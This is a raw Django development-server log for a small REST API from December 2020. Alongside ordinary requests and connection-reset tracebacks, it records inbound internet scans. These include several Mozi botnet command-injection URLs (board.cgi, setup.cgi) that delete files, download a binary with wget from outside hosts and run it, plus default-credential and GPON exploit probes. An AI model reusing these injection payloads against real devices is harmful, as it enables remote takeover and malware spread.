[09/Dec/2020 01:28:45] "º«d¡EZCÛMî^ý¿9 XÔ>Ä<àÏ ¬ 9×#8~ÞReF¿%1Qà&g»íZP+eÃæ¤lêYÄÈHÇgÁ4FW|ûóT¸ýË»)ãÎÝÍ7ïP¤[VýÉlõäÁdX÷¿èq&Û,õ×¨j;ãê§´°­EªB)©é¯}¸ï¨èâÓí)1ÁðÛ¥HZ«Î¿ôE%P*KFY6ç::jÔ¨Vª«¯Ã&.í[Åe¾r§°F÷åÖIm+wýuU!x¬èMPyÃ!2 íÀ}!RwÄá ¯+­KkÅà\s½Ë" 400 -
Not Found: /
[09/Dec/2020 02:14:45] "GET / HTTP/1.1" 404 2136
Not Found: /HNAP1/
[09/Dec/2020 02:14:46] "GET /HNAP1/ HTTP/1.1" 404 2172
----------------------------------------
Exception happened during processing of request from ('37.9.13.98', 14231)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[09/Dec/2020 04:26:33] "GET / HTTP/1.1" 404 2136
Not Found: /
[09/Dec/2020 05:02:59] "GET / HTTP/1.1" 404 2131
Not Found: /
[09/Dec/2020 05:03:50] "GET / HTTP/1.1" 404 2136
Not Found: /board.cgi
[09/Dec/2020 06:39:26] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron" 404 2312
----------------------------------------
Exception happened during processing of request from ('37.9.13.92', 32037)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('167.248.133.37', 51896)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[09/Dec/2020 07:15:57] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('167.248.133.37', 46876)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[09/Dec/2020 07:15:57] "GET / HTTP/1.1" 404 2136
Not Found: /
[09/Dec/2020 08:13:11] "GET / HTTP/1.0" 404 2173
Not Found: /actuator/health
[09/Dec/2020 09:17:50] "GET /actuator/health HTTP/1.1" 404 2199
Not Found: /config/getuser
[09/Dec/2020 11:51:12] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
Not Found: /http:/example.com/
[09/Dec/2020 12:41:30] "GET http://example.com/ HTTP/1.1" 404 1665
Not Found: /http:/example.com/
[09/Dec/2020 13:16:39] "GET http://example.com/ HTTP/1.1" 404 1665
Not Found: /http:/example.com/
[09/Dec/2020 14:46:25] "GET http://example.com/ HTTP/1.1" 404 1665
Not Found: /manager/html
[09/Dec/2020 15:19:41] "GET /manager/html HTTP/1.1" 404 2190
Not Found: /setup.cgi
[09/Dec/2020 15:34:41] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://222.139.118.27:39912/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 2384
Not Found: /http:/example.com/
[09/Dec/2020 15:52:06] "GET http://example.com/ HTTP/1.1" 404 1665
Not Found: /
[09/Dec/2020 17:24:41] "GET / HTTP/1.0" 404 2136
Not Found: /hudson
[09/Dec/2020 18:59:23] "GET /hudson HTTP/1.1" 404 2172
Not Found: /
[09/Dec/2020 22:12:08] "GET / HTTP/1.1" 404 2136
Not Found: /
[09/Dec/2020 22:19:51] "GET / HTTP/1.1" 404 2136
Not Found: /
[09/Dec/2020 23:01:51] "GET / HTTP/1.1" 404 2131
Not Found: /
[10/Dec/2020 01:14:38] "GET / HTTP/1.0" 404 2173
Not Found: /www.origin.com:443
[10/Dec/2020 03:01:57] "CONNECT www.origin.com:443 HTTP/1.1" 404 1674
Not Found: /
[10/Dec/2020 03:08:13] "GET / HTTP/1.1" 404 2136
Not Found: /
[10/Dec/2020 04:08:37] "GET / HTTP/1.1" 404 2136
Not Found: /
[10/Dec/2020 04:59:35] "GET / HTTP/1.1" 404 2136
Not Found: /http:/example.com/
[10/Dec/2020 05:24:43] "GET http://example.com/ HTTP/1.1" 404 1665
Not Found: /boaform/admin/formLogin
[10/Dec/2020 05:49:12] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 2289
Not Found: /
[10/Dec/2020 07:31:28] "GET / HTTP/1.0" 404 2173
Not Found: /actuator/health
[10/Dec/2020 09:39:41] "GET /actuator/health HTTP/1.1" 404 2199
Not Found: /
[10/Dec/2020 10:31:02] "GET / HTTP/1.1" 404 2136
[10/Dec/2020 11:12:11] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 11:12:11] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /config/getuser
[10/Dec/2020 12:09:55] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
[10/Dec/2020 12:39:21] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 12:39:21] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[10/Dec/2020 13:48:27] "GET / HTTP/1.1" 404 2131
Not Found: /robots.txt
[10/Dec/2020 13:48:28] "GET /robots.txt HTTP/1.1" 404 2184
----------------------------------------
Exception happened during processing of request from ('66.240.205.34', 59158)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /sitemap.xml
[10/Dec/2020 13:48:28] "GET /sitemap.xml HTTP/1.1" 404 2187
----------------------------------------
Exception happened during processing of request from ('66.240.205.34', 59212)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /.well-known/security.txt
[10/Dec/2020 13:48:28] "GET /.well-known/security.txt HTTP/1.1" 404 2226
----------------------------------------
Exception happened during processing of request from ('66.240.205.34', 59246)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /favicon.ico
[10/Dec/2020 13:48:29] "GET /favicon.ico HTTP/1.1" 404 2187
[10/Dec/2020 14:06:28] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 14:06:28] "  /*à     Cookie: mstshash=Administr" 400 -
[10/Dec/2020 14:23:26] "GET /api/vi/ddobakis/ HTTP/1.1" 200 77110
[10/Dec/2020 14:23:26] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[10/Dec/2020 14:23:26] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[10/Dec/2020 14:23:26] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[10/Dec/2020 14:23:26] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[10/Dec/2020 14:23:26] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[10/Dec/2020 14:23:26] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[10/Dec/2020 14:23:26] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[10/Dec/2020 14:23:26] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[10/Dec/2020 14:23:26] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[10/Dec/2020 14:23:26] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[10/Dec/2020 14:23:26] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[10/Dec/2020 14:23:27] "GET /favicon.ico HTTP/1.1" 404 2228
[10/Dec/2020 14:23:52] "GET /api/vi/ddobakis/ HTTP/1.1" 200 77110
[10/Dec/2020 14:28:15] "GET /api/vi/ddobakis/ HTTP/1.1" 200 77110
[10/Dec/2020 14:28:16] "GET /api/vi/ddobakis/ HTTP/1.1" 200 77110
[10/Dec/2020 14:28:40] "GET /api/vi/ddobakis/ HTTP/1.1" 200 77110
[10/Dec/2020 14:28:45] "GET /api/vi/ddobakis/ HTTP/1.1" 200 77110
Watching for file changes with StatReloader
[10/Dec/2020 15:01:05] "GET /api/vi/ddobakis/ HTTP/1.1" 200 87699
[10/Dec/2020 15:03:29] code 400, message Bad request syntax ('º«d¡EZCÛM\x87î^ý¿\x159 XÔ>\x12\x98Ä<à\x13Ï\x00¬\xa09×\x90#8~\x8cÞ\x9dReF¿%1Qà\x9d\x06&g»\x82\x95\x19í\x07\x14\x19ZP\x80+\x94eÃæ\x85\x06¤\x99\x8b\x19l\x01ê\x88Y\x91\x16\x95ÄÈ\x0eH\x02Ç\x93gÁ4FW\x05|ûóT¸ýË»)ãÎÝÍ7\x9eïP\x8c¤[Vý\x98Él\x82õäÁd\x87X÷\x9b¿èq\x12\x99&Û,õ\x87×¨\x97j;ãê§´°\x02\xad\x8dE\x9bªB\x80\x0e)©é¯}\x18\x8e¸\x1e\x99\x04ï¨\x8cè\x04âÓí)1\x91Á\x8f\x88\x8c\x81ðÛ¥\x88\x95H\x9bZ«Î¿ôE%P*\x88KFY6\x9eç::jÔ\x8a¨V\x9aª«¯Ã&.í[\x04Åe\x7f\x08¾\x8ar§°\x99F÷\x11åÖ\x96\x8cIm+w\x1cýuU\x14\x0f!x¬èMPyÃ\x19!2\xa0íÀ}!Rw\x14\x8e\x1bÄá\xa0¯+\xadKkÅà\\s\x9c½Ë')
[10/Dec/2020 15:03:29] "º«d¡EZCÛMî^ý¿9 XÔ>Ä<àÏ ¬ 9×#8~ÞReF¿%1Qà&g»íZP+eÃæ¤lêYÄÈHÇgÁ4FW|ûóT¸ýË»)ãÎÝÍ7ïP¤[VýÉlõäÁdX÷¿èq&Û,õ×¨j;ãê§´°­EªB)©é¯}¸ï¨èâÓí)1ÁðÛ¥HZ«Î¿ôE%P*KFY6ç::jÔ¨Vª«¯Ã&.í[Åe¾r§°F÷åÖIm+wýuU!x¬èMPyÃ!2 íÀ}!RwÄá ¯+­KkÅà\s½Ë" 400 -
Watching for file changes with StatReloader
[10/Dec/2020 15:10:03] "GET /api/vi/ddobakis/ HTTP/1.1" 200 87694
[10/Dec/2020 15:10:59] "GET /api/vi/ddobakis/ HTTP/1.1" 200 87694
Not Found: /favicon.ico
[10/Dec/2020 15:11:00] "GET /favicon.ico HTTP/1.1" 404 2228
Not Found: /favicon.ico
[10/Dec/2020 15:11:34] "GET /favicon.ico HTTP/1.1" 404 2228
[10/Dec/2020 15:32:32] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 15:32:32] "  /*à     Cookie: mstshash=Administr" 400 -
[10/Dec/2020 15:50:51] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[10/Dec/2020 15:50:51] "GET /api/vi/ddobakis/ HTTP/1.1" 200 87694
[10/Dec/2020 15:50:51] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[10/Dec/2020 15:50:51] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[10/Dec/2020 15:50:51] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[10/Dec/2020 15:50:51] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[10/Dec/2020 15:50:51] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[10/Dec/2020 15:50:51] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[10/Dec/2020 15:50:51] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[10/Dec/2020 15:50:51] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[10/Dec/2020 15:50:51] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[10/Dec/2020 15:50:51] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[10/Dec/2020 16:54:02] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 16:54:02] "  /*à     Cookie: mstshash=Administr" 400 -
[10/Dec/2020 18:09:51] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 18:09:51] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[10/Dec/2020 18:13:42] "GET /manager/html HTTP/1.1" 400 61530
Not Found: /
[10/Dec/2020 19:01:53] "GET / HTTP/1.0" 404 2173
----------------------------------------
Exception happened during processing of request from ('162.142.125.38', 48790)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[10/Dec/2020 19:08:57] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('162.142.125.38', 48994)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[10/Dec/2020 19:08:57] "GET / HTTP/1.1" 404 2136
Not Found: /hudson
[10/Dec/2020 19:21:49] "GET /hudson HTTP/1.1" 404 2172
[10/Dec/2020 19:22:10] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 19:22:10] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[10/Dec/2020 19:38:40] "GET / HTTP/1.1" 404 2136
[10/Dec/2020 20:06:57] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 20:06:57] "  /*à     Cookie: mstshash=Administr" 400 -
----------------------------------------
Exception happened during processing of request from ('167.248.133.37', 51700)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[10/Dec/2020 21:13:43] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('167.248.133.37', 46862)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[10/Dec/2020 21:13:44] "GET / HTTP/1.1" 404 2136
Not Found: /
[10/Dec/2020 21:17:25] "GET / HTTP/1.1" 404 2136
Not Found: /HNAP1/
[10/Dec/2020 21:17:28] "GET /HNAP1/ HTTP/1.1" 404 2172
Not Found: /
[10/Dec/2020 21:36:54] "GET / HTTP/1.1" 404 2131
[10/Dec/2020 21:42:13] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 21:42:13] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /GponForm/diag_Form
[10/Dec/2020 21:49:51] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 2215
----------------------------------------
Exception happened during processing of request from ('120.43.128.7', 28299)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /index.html
[10/Dec/2020 22:33:22] "GET /index.html HTTP/1.1" 404 2184
Not Found: /http:/example.com/
[10/Dec/2020 22:54:00] "GET http://example.com/ HTTP/1.1" 404 1665
[10/Dec/2020 23:09:41] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[10/Dec/2020 23:09:41] "  /*à     Cookie: mstshash=Administr" 400 -
[10/Dec/2020 23:50:56] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[10/Dec/2020 23:51:10] "GET /api/vi/ddobakis/ HTTP/1.1" 200 88190
[10/Dec/2020 23:51:10] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[10/Dec/2020 23:51:10] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[10/Dec/2020 23:51:26] "POST /api/vi/ddobakis/ HTTP/1.1" 201 192
[10/Dec/2020 23:51:29] "GET /api/vi/ddobakis/ HTTP/1.1" 200 88685
Bad Request: /api/vi/ddobakis/
[10/Dec/2020 23:51:44] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[10/Dec/2020 23:51:48] "GET /api/vi/ddobakis/ HTTP/1.1" 200 88685
[10/Dec/2020 23:52:06] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[10/Dec/2020 23:52:09] "GET /api/vi/ddobakis/ HTTP/1.1" 200 89181
[11/Dec/2020 00:09:39] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 57208)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[11/Dec/2020 00:33:46] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[11/Dec/2020 00:33:46] "  /*à     Cookie: mstshash=Administr" 400 -
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 00:48:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 57375)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('74.120.14.56', 37710)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[11/Dec/2020 01:56:34] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('74.120.14.56', 32892)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[11/Dec/2020 01:56:35] "GET / HTTP/1.1" 404 2136
Not Found: /
[11/Dec/2020 03:56:03] "GET / HTTP/1.1" 404 2136
Not Found: /config/getuser
[11/Dec/2020 06:53:00] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
Not Found: /
[11/Dec/2020 07:49:59] "GET / HTTP/1.0" 404 2136
Not Found: /
[11/Dec/2020 08:59:30] "GET / HTTP/1.1" 404 2136
Not Found: /
[11/Dec/2020 10:11:10] "GET / HTTP/1.0" 404 2173
Not Found: /board.cgi
[11/Dec/2020 10:50:26] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://49.143.32.36:3566/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron" 404 2313
Not Found: /
[11/Dec/2020 12:03:58] "GET / HTTP/1.1" 404 2136
